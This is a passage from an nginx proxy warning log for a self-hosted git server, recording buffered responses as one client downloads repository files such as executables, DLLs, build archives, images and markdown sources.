/var/cache/nginx/proxy_temp/0/13/0000015130 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/proxy-host-4_access.log" -2026/02/17 16:54:50 [warn] 919#919: *69854 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/13/0000015131 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/blame/branch/main/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-4_access.log" -2026/02/17 16:55:43 [warn] 919#919: *70857 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/13/0000015132 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libssl-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libssl-3-x64.dll" -2026/02/17 16:57:37 [warn] 919#919: *70857 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/13/0000015133 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libcrypto-3-x64.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" -2026/02/17 17:06:01 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/13/0000015134 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" -2026/02/17 17:07:10 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/13/0000015135 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" -2026/02/17 17:07:47 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/13/0000015136 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/bearing.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" -2026/02/17 17:10:01 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/13/0000015137 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/dist/PostgresWatchdog.exe" -2026/02/17 17:11:58 [warn] 923#923: *71863 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/13/0000015138 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/chromedriver.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" -2026/02/17 17:15:43 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/13/0000015139 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" -2026/02/17 17:16:09 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/14/0000015140 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libiconv-2.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libiconv-2.dll" -2026/02/17 17:17:52 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/14/0000015141 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -2026/02/17 17:17:55 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/14/0000015142 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -2026/02/17 17:17:58 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/14/0000015143 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -2026/02/17 17:18:01 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/14/0000015144 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" -2026/02/17 17:18:04 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/14/0000015145 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -2026/02/17 17:18:06 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/14/0000015146 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -2026/02/17 17:18:12 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/14/0000015147 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" -2026/02/17 17:18:23 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/14/0000015148 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -2026/02/17 17:18:28 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/14/0000015149 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" -2026/02/17 17:21:24 [warn] 923#923: *72866 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/15/0000015150 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" -2026/02/17 17:23:17 [warn] 923#923: *73870 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/15/0000015151 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresWatchdog/libstdc++-6.dll", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libstdc++-6.dll" -2026/02/17 17:23:35 [warn] 923#923: *73870 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/15/0000015152 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/nos_setup.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/nos_setup.exe" -2026/02/17 17:32:15 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/15/0000015153 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom6.png" -2026/02/17 17:32:22 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/15/0000015154 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom3.png" -2026/02/17 17:32:31 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/15/0000015155 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom7.png" -2026/02/17 17:32:34 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/15/0000015156 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/ControlRoom2.png" -2026/02/17 17:35:58 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/15/0000015157 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.exe" -2026/02/17 17:37:40 [warn] 923#923: *74872 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/15/0000015158 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -2026/02/17 17:40:39 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/15/0000015159 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom7.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -2026/02/17 17:40:42 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/16/0000015160 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/index.html" -2026/02/17 17:40:54 [warn] 923#923: *75874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/16/0000015161 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/ControlRoom2.png" -2026/02/17 18:08:18 [warn] 931#931: *78190 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/16/0000015162 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/controller-cpp.md" -2026/02/17 18:11:45 [warn] 931#931: *78190 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/16/0000015163 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp.md" -2026/02/17 18:15:28 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/16/0000015164 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=rendered", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" -2026/02/17 18:15:32 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/16/0000015165 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md?display=source", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/controller-cpp.md" -2026/02/17 18:17:27 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/16/0000015166 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -2026/02/17 18:23:06 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/16/0000015167 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" -2026/02/17 18:23:09 [warn] 930#930: *79191 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/16/0000015168 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -2026/02/17 18:26:16 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/16/0000015169 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" -2026/02/17 18:26:43 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/17/0000015170 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" -2026/02/17 18:27:28 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/17/0000015171 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" -2026/02/17 18:27:30 [warn] 935#935: *80216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/17/0000015172 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" -2026/02/17 18:32:01 [warn] 934#934: *81220 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/17/0000015173 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldBar.ico", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.ico" -2026/02/17 18:32:45 [warn] 934#934: *81220 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/17/0000015174 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/base_library.zip" -2026/02/17 18:49:25 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/91/0000015918 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/PostgresPatrol.pkg", host: "git.hanmocnn.co.kr", referrer: 